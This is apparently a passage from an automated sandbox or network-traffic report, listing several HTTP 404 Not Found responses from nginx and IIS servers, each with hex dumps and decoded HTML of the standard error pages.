3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 07:00:11 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 07:00:12 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Sun, 08 Sep 2024 07:00:10 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 07:00:12 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 07:00:11 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 07:00:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 07:00:12 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Sun, 08 Sep 2024 07:00:12 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 